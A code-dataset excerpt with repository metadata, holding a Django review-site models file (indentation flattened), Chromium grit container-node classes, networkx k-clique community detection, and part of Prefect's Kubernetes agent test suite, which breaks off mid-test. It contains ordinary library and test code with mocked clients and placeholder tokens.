93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth import get_user_model
from .validators import date_validator
from django.core.validators import MinValueValidator, MaxValueValidator
User = get_user_model()
class Genres(models.Model):
name = models.CharField(verbose_name='Название жанра', max_length=200)
slug = models.SlugField(verbose_name='Слаг', unique=True)
def __str__(self):
return self.name
class Categories(models.Model):
name = models.CharField(verbose_name='Имя категории', max_length=200)
slug = models.SlugField(verbose_name='Слаг', unique=True)
def __str__(self):
return self.name
class Title(models.Model):
name = models.CharField(
verbose_name='Название произведения',
max_length=300
)
year = models.PositiveSmallIntegerField(
verbose_name='Год выхода произведения',
null=True,
blank=True,
validators=[date_validator]
)
description = models.CharField(
verbose_name='Описание',
max_length=1000,
blank=True
)
category = models.ForeignKey(
Categories,
verbose_name='Категория произведения',
on_delete=models.SET_NULL,
null=True,
blank=True
)
genre = models.ManyToManyField(Genres, verbose_name='Жанр произведения')
def __str__(self):
return self.name
class Review(models.Model):
title_id = models.ForeignKey(
Title,
verbose_name='ID произведения',
on_delete=models.CASCADE,
related_name='review'
)
text = models.TextField(verbose_name='Текст отзыва', max_length=1000)
author = models.ForeignKey(
User,
verbose_name='Автор отзыва',
on_delete=models.CASCADE,
related_name='review'
)
score = models.IntegerField(
default=None,
verbose_name='Рейтинг от 1 до 10',
validators=[MaxValueValidator(10),
MinValueValidator(1)])
pub_date = models.DateTimeField(
verbose_name='Дата публикации',
auto_now_add=True
)
def __str__(self):
return self.title_id
class Comment(models.Model):
review = models.ForeignKey(
Review, verbose_name='Отзыв',
on_delete=models.CASCADE,
related_name='comments'
)
author = models.ForeignKey(
User, verbose_name='Автор комментария',
on_delete=models.CASCADE,
related_name='comments'
)
text = models.TextField(verbose_name='Текст комментария')
pub_date = models.DateTimeField(verbose_name='Дата добавления',
auto_now_add=True,
db_index=True
)
class Meta:
ordering = ['-pub_date']
| 27.097087
| 76
| 0.635973
|
cfff7a46d5477eb4e278e7191fed6a8932cfd462
| 2,073
|
py
|
Python
|
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | 11
|
2015-03-20T04:08:08.000Z
|
2021-11-15T15:51:36.000Z
|
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | null | null | null |
tools/grit/grit/node/empty.py
|
rwatson/chromium-capsicum
|
b03da8e897f897c6ad2cda03ceda217b760fd528
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python2.4
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Container nodes that don't have any logic.
'''
from grit.node import base
from grit.node import include
from grit.node import structure
from grit.node import message
from grit.node import io
from grit.node import misc
class GroupingNode(base.Node):
'''Base class for all the grouping elements (<structures>, <includes>,
<messages> and <identifiers>).'''
def DefaultAttributes(self):
return {
'first_id' : '',
'comment' : '',
'fallback_to_english' : 'false',
}
class IncludesNode(GroupingNode):
'''The <includes> element.'''
def _IsValidChild(self, child):
return isinstance(child, (include.IncludeNode, misc.IfNode))
class MessagesNode(GroupingNode):
'''The <messages> element.'''
def _IsValidChild(self, child):
return isinstance(child, (message.MessageNode, misc.IfNode))
def ItemFormatter(self, t):
'''Return the stringtable itemformatter if an RC is being formatted.'''
if t in ['rc_all', 'rc_translateable', 'rc_nontranslateable']:
from grit.format import rc # avoid circular dep by importing here
return rc.StringTable()
elif t == 'js_map_format':
from grit.format import js_map_format
return js_map_format.StringTable()
class StructuresNode(GroupingNode):
'''The <structures> element.'''
def _IsValidChild(self, child):
return isinstance(child, (structure.StructureNode, misc.IfNode))
class TranslationsNode(base.Node):
'''The <translations> element.'''
def _IsValidChild(self, child):
return isinstance(child, io.FileNode)
class OutputsNode(base.Node):
'''The <outputs> element.'''
def _IsValidChild(self, child):
return isinstance(child, io.OutputNode)
class IdentifiersNode(GroupingNode):
'''The <identifiers> element.'''
def _IsValidChild(self, child):
from grit.node import misc
return isinstance(child, misc.IdentifierNode)
| 28.39726
| 75
| 0.712976
|
e1dc8058b6e0152593649500126a2c7d88432e24
| 2,483
|
py
|
Python
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 1
|
2019-12-03T14:58:04.000Z
|
2019-12-03T14:58:04.000Z
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 1
|
2019-12-19T16:49:00.000Z
|
2019-12-20T06:22:46.000Z
|
networkx/algorithms/community/kclique.py
|
bforte/networkx
|
a8c09757f52c2d690d0c8cd983e55a2af9b8d260
|
[
"BSD-3-Clause"
] | 2
|
2020-02-13T10:33:34.000Z
|
2020-08-09T07:59:26.000Z
|
from collections import defaultdict
import networkx as nx
__all__ = ['k_clique_communities']
def k_clique_communities(G, k, cliques=None):
"""Find k-clique communities in graph using the percolation method.
A k-clique community is the union of all cliques of size k that
can be reached through adjacent (sharing k-1 nodes) k-cliques.
Parameters
----------
G : NetworkX graph
k : int
Size of smallest clique
cliques: list or generator
Precomputed cliques (use networkx.find_cliques(G))
Returns
-------
Yields sets of nodes, one for each k-clique community.
Examples
--------
>>> from networkx.algorithms.community import k_clique_communities
>>> G = nx.complete_graph(5)
>>> K5 = nx.convert_node_labels_to_integers(G,first_label=2)
>>> G.add_edges_from(K5.edges())
>>> c = list(k_clique_communities(G, 4))
>>> sorted(list(c[0]))
[0, 1, 2, 3, 4, 5, 6]
>>> list(k_clique_communities(G, 6))
[]
References
----------
.. [1] Gergely Palla, Imre Derényi, Illés Farkas1, and Tamás Vicsek,
Uncovering the overlapping community structure of complex networks
in nature and society Nature 435, 814-818, 2005,
doi:10.1038/nature03607
"""
if k < 2:
raise nx.NetworkXError("k=%d, k must be greater than 1." % k)
if cliques is None:
cliques = nx.find_cliques(G)
cliques = [frozenset(c) for c in cliques if len(c) >= k]
# First index which nodes are in which cliques
membership_dict = defaultdict(list)
for clique in cliques:
for node in clique:
membership_dict[node].append(clique)
# For each clique, see which adjacent cliques percolate
perc_graph = nx.Graph()
perc_graph.add_nodes_from(cliques)
for clique in cliques:
for adj_clique in _get_adjacent_cliques(clique, membership_dict):
if len(clique.intersection(adj_clique)) >= (k - 1):
perc_graph.add_edge(clique, adj_clique)
# Connected components of clique graph with perc edges
# are the percolated cliques
for component in nx.connected_components(perc_graph):
yield(frozenset.union(*component))
def _get_adjacent_cliques(clique, membership_dict):
adjacent_cliques = set()
for n in clique:
for adj_clique in membership_dict[n]:
if clique != adj_clique:
adjacent_cliques.add(adj_clique)
return adjacent_cliques
| 31.43038
| 73
| 0.658478
|
7fef2104499d6eea5138ec29d79b2f8b587625ed
| 52,423
|
py
|
Python
|
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
tests/agent/test_k8s_agent.py
|
maxkferg/prefect
|
742153b6ebeb46e2f2f598ef54c28a9a53c2c271
|
[
"Apache-2.0"
] | null | null | null |
import json
from unittest.mock import MagicMock
import pendulum
import pytest
pytest.importorskip("kubernetes")
import yaml
import prefect
from prefect.agent.kubernetes.agent import KubernetesAgent, read_bytes_from_path
from prefect.environments import LocalEnvironment
from prefect.storage import Docker, Local
from prefect.run_configs import KubernetesRun, LocalRun, UniversalRun
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.exceptions import ClientError
from prefect.utilities.graphql import GraphQLResult
@pytest.fixture(autouse=True)
def mocked_k8s_config(monkeypatch):
k8s_config = MagicMock()
monkeypatch.setattr("kubernetes.config", k8s_config)
def test_k8s_agent_init(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
assert agent
assert agent.agent_config_id is None
assert agent.labels == []
assert agent.name == "agent"
assert agent.batch_client
def test_k8s_agent_config_options(monkeypatch, cloud_api):
k8s_client = MagicMock()
monkeypatch.setattr("kubernetes.client", k8s_client)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = KubernetesAgent(name="test", labels=["test"], namespace="namespace")
assert agent
assert agent.labels == ["test"]
assert agent.name == "test"
assert agent.namespace == "namespace"
assert agent.client.get_auth_token() == "TEST_TOKEN"
assert agent.logger
assert agent.batch_client
@pytest.mark.parametrize(
"core_version,command",
[
("0.10.0", "prefect execute cloud-flow"),
("0.6.0+134", "prefect execute cloud-flow"),
("0.13.0", "prefect execute flow-run"),
("0.13.1+134", "prefect execute flow-run"),
],
)
def test_k8s_agent_deploy_flow(core_version, command, monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": core_version,
}
),
"id": "id",
}
)
)
assert agent.batch_client.create_namespaced_job.called
assert (
agent.batch_client.create_namespaced_job.call_args[1]["namespace"] == "default"
)
assert (
agent.batch_client.create_namespaced_job.call_args[1]["body"]["apiVersion"]
== "batch/v1"
)
assert agent.batch_client.create_namespaced_job.call_args[1]["body"]["spec"][
"template"
]["spec"]["containers"][0]["args"] == [command]
def test_k8s_agent_deploy_flow_uses_environment_metadata(monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Local().serialize(),
"environment": LocalEnvironment(
metadata={"image": "repo/name:tag"}
).serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
)
assert agent.batch_client.create_namespaced_job.called
assert (
agent.batch_client.create_namespaced_job.call_args[1]["body"]["spec"][
"template"
]["spec"]["containers"][0]["image"]
== "repo/name:tag"
)
def test_k8s_agent_deploy_flow_raises(monkeypatch, cloud_api):
batch_client = MagicMock()
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
core_client = MagicMock()
core_client.list_namespaced_pod.return_value = MagicMock(items=[])
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
with pytest.raises(ValueError):
agent.deploy_flow(
flow_run=GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Local().serialize(),
"id": "id",
"environment": LocalEnvironment().serialize(),
"core_version": "0.13.0",
}
),
"id": "id",
}
)
)
assert not agent.batch_client.create_namespaced_job.called
def test_k8s_agent_replace_yaml_uses_user_env_vars(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "my-secret")
monkeypatch.setenv("JOB_MEM_REQUEST", "mr")
monkeypatch.setenv("JOB_MEM_LIMIT", "ml")
monkeypatch.setenv("JOB_CPU_REQUEST", "cr")
monkeypatch.setenv("JOB_CPU_LIMIT", "cl")
monkeypatch.setenv("IMAGE_PULL_POLICY", "custom_policy")
monkeypatch.setenv("SERVICE_ACCOUNT_NAME", "svc_name")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
agent = KubernetesAgent(env_vars=dict(AUTH_THING="foo", PKG_SETTING="bar"))
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert job["metadata"]["labels"]["prefect.io/flow_run_id"] == "id"
assert job["metadata"]["labels"]["prefect.io/flow_id"] == "new_id"
assert (
job["spec"]["template"]["metadata"]["labels"]["prefect.io/flow_run_id"]
== "id"
)
assert (
job["spec"]["template"]["spec"]["containers"][0]["image"] == "test/name:tag"
)
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[0]["value"] == "https://api.prefect.io"
assert env[1]["value"] == "token"
assert env[2]["value"] == "id"
assert env[3]["value"] == "new_id"
assert env[4]["value"] == "default"
assert env[5]["value"] == "[]"
assert env[6]["value"] == "true"
user_vars = [
dict(name="AUTH_THING", value="foo"),
dict(name="PKG_SETTING", value="bar"),
]
assert env[-1] in user_vars
assert env[-2] in user_vars
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== "custom_policy"
)
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "svc_name"
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "my-secret"}
]
def test_k8s_agent_replace_yaml_respects_multiple_image_secrets(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "some-secret,other-secret")
monkeypatch.setenv("IMAGE_PULL_POLICY", "custom_policy")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
agent = KubernetesAgent(env_vars=dict(AUTH_THING="foo", PKG_SETTING="bar"))
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
expected_secrets = [{"name": "some-secret"}, {"name": "other-secret"}]
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == expected_secrets
def test_k8s_agent_replace_yaml(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
monkeypatch.setenv("IMAGE_PULL_SECRETS", "my-secret")
monkeypatch.setenv("JOB_MEM_REQUEST", "mr")
monkeypatch.setenv("JOB_MEM_LIMIT", "ml")
monkeypatch.setenv("JOB_CPU_REQUEST", "cr")
monkeypatch.setenv("JOB_CPU_LIMIT", "cl")
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
with set_temporary_config(
{"cloud.agent.auth_token": "token", "logging.log_to_cloud": True}
):
volume_mounts = [{"name": "my-vol", "mountPath": "/mnt/my-mount"}]
volumes = [{"name": "my-vol", "hostPath": "/host/folder"}]
agent = KubernetesAgent(volume_mounts=volume_mounts, volumes=volumes)
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert job["metadata"]["labels"]["prefect.io/flow_run_id"] == "id"
assert job["metadata"]["labels"]["prefect.io/flow_id"] == "new_id"
assert (
job["spec"]["template"]["metadata"]["labels"]["prefect.io/flow_run_id"]
== "id"
)
assert (
job["spec"]["template"]["spec"]["containers"][0]["image"] == "test/name:tag"
)
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[0]["value"] == "https://api.prefect.io"
assert env[1]["value"] == "token"
assert env[2]["value"] == "id"
assert env[3]["value"] == "new_id"
assert env[4]["value"] == "default"
assert env[5]["value"] == "[]"
assert env[6]["value"] == "true"
assert (
job["spec"]["template"]["spec"]["imagePullSecrets"][0]["name"]
== "my-secret"
)
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
assert resources["requests"]["memory"] == "mr"
assert resources["limits"]["memory"] == "ml"
assert resources["requests"]["cpu"] == "cr"
assert resources["limits"]["cpu"] == "cl"
volumeMounts = job["spec"]["template"]["spec"]["containers"][0]["volumeMounts"]
assert volumeMounts[0]["name"] == "my-vol"
assert volumeMounts[0]["mountPath"] == "/mnt/my-mount"
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== "IfNotPresent"
)
volumes = job["spec"]["template"]["spec"]["volumes"]
assert volumes[0]["name"] == "my-vol"
assert volumes[0]["hostPath"] == "/host/folder"
assert job["spec"]["template"]["spec"].get("serviceAccountName", None) is None
@pytest.mark.parametrize("flag", [True, False])
def test_k8s_agent_replace_yaml_responds_to_logging_config(
monkeypatch, cloud_api, flag
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
"name": "name",
}
)
agent = KubernetesAgent(no_cloud_logs=flag)
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[6]["value"] == str(not flag).lower()
def test_k8s_agent_replace_yaml_no_pull_secrets(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent()
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert not job["spec"]["template"]["spec"].get("imagePullSecrets", None)
def test_k8s_agent_removes_yaml_no_volume(monkeypatch, cloud_api):
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent()
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
assert not job["spec"]["template"]["spec"].get("volumes", None)
assert not job["spec"]["template"]["spec"]["containers"][0].get(
"volumeMounts", None
)
def test_k8s_agent_includes_agent_labels_in_job(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
flow_run = GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": Docker(
registry_url="test", image_name="name", image_tag="tag"
).serialize(),
"environment": LocalEnvironment().serialize(),
"id": "new_id",
"core_version": "0.13.0",
}
),
"id": "id",
}
)
agent = KubernetesAgent(labels=["foo", "bar"])
job = agent.generate_job_spec_from_environment(flow_run, image="test/name:tag")
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[5]["value"] == "['foo', 'bar']"
def test_k8s_agent_generate_deployment_yaml(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
backend="backend-test",
)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[0]["value"] == "test_token"
assert agent_env[1]["value"] == "test_api"
assert agent_env[2]["value"] == "test_namespace"
assert agent_env[11]["value"] == "backend-test"
def test_k8s_agent_generate_deployment_yaml_env_vars(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
env_vars = {"test1": "test2", "test3": "test4"}
deployment = agent.generate_deployment_yaml(env_vars=env_vars)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[13]["name"] == "PREFECT__CLOUD__AGENT__ENV_VARS"
assert agent_env[13]["value"] == json.dumps(env_vars)
def test_k8s_agent_generate_deployment_yaml_backend_default(monkeypatch, server_api):
c = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Client", c)
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml()
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[11]["value"] == "server"
@pytest.mark.parametrize(
"version",
[
("0.6.3", "0.6.3-python3.6"),
("0.5.3+114.g35bc7ba4", "latest"),
("0.5.2+999.gr34343.dirty", "latest"),
],
)
def test_k8s_agent_generate_deployment_yaml_local_version(
monkeypatch, version, cloud_api
):
monkeypatch.setattr(prefect, "__version__", version[0])
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
)
deployment = yaml.safe_load(deployment)
agent_yaml = deployment["spec"]["template"]["spec"]["containers"][0]
assert agent_yaml["image"] == "prefecthq/prefect:{}".format(version[1])
def test_k8s_agent_generate_deployment_yaml_latest(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
latest=True,
)
deployment = yaml.safe_load(deployment)
agent_yaml = deployment["spec"]["template"]["spec"]["containers"][0]
assert agent_yaml["image"] == "prefecthq/prefect:latest"
def test_k8s_agent_generate_deployment_yaml_labels(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
labels=["test_label1", "test_label2"],
)
deployment = yaml.safe_load(deployment)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[0]["value"] == "test_token"
assert agent_env[1]["value"] == "test_api"
assert agent_env[2]["value"] == "test_namespace"
assert agent_env[4]["value"] == "['test_label1', 'test_label2']"
assert len(deployment["spec"]["template"]["spec"]["containers"]) == 1
def test_k8s_agent_generate_deployment_yaml_no_image_pull_secrets(
monkeypatch, cloud_api
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token", api="test_api", namespace="test_namespace"
)
deployment = yaml.safe_load(deployment)
assert deployment["spec"]["template"]["spec"].get("imagePullSecrets") is None
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[3]["value"] == ""
def test_k8s_agent_generate_deployment_yaml_contains_image_pull_secrets(
monkeypatch, cloud_api
):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
image_pull_secrets="secrets",
)
deployment = yaml.safe_load(deployment)
assert (
deployment["spec"]["template"]["spec"]["imagePullSecrets"][0]["name"]
== "secrets"
)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert agent_env[3]["value"] == "secrets"
def test_k8s_agent_generate_deployment_yaml_contains_resources(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token",
api="test_api",
namespace="test_namespace",
mem_request="mr",
mem_limit="ml",
cpu_request="cr",
cpu_limit="cl",
image_pull_policy="custom_policy",
service_account_name="svc",
)
deployment = yaml.safe_load(deployment)
env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
assert env[5]["value"] == "mr"
assert env[6]["value"] == "ml"
assert env[7]["value"] == "cr"
assert env[8]["value"] == "cl"
assert env[9]["value"] == "custom_policy"
assert env[10]["value"] == "svc"
def test_k8s_agent_generate_deployment_yaml_rbac(monkeypatch, cloud_api):
get_jobs = MagicMock(return_value=[])
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.KubernetesAgent.manage_jobs",
get_jobs,
)
agent = KubernetesAgent()
deployment = agent.generate_deployment_yaml(
token="test_token", api="test_api", namespace="test_namespace", rbac=True
)
deployment = yaml.safe_load_all(deployment)
for document in deployment:
if "rbac" in document:
assert "rbac" in document["apiVersion"]
assert document["metadata"]["namespace"] == "test_namespace"
assert document["metadata"]["name"] == "prefect-agent-rbac"
def test_k8s_agent_manage_jobs_pass(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.heartbeat()
def test_k8s_agent_manage_jobs_delete_jobs(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = True
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
batch_client.delete_namespaced_job.return_value = None
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert batch_client.delete_namespaced_job.called
def test_k8s_agent_manage_jobs_does_not_delete_if_disabled(monkeypatch, cloud_api):
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = True
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
batch_client.delete_namespaced_job.return_value = None
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent(delete_finished_jobs=False)
agent.manage_jobs()
assert not batch_client.delete_namespaced_job.called
def test_k8s_agent_manage_jobs_reports_failed_pods(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
write_run_logs=None,
get_flow_run_state=prefect.engine.state.Success(),
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
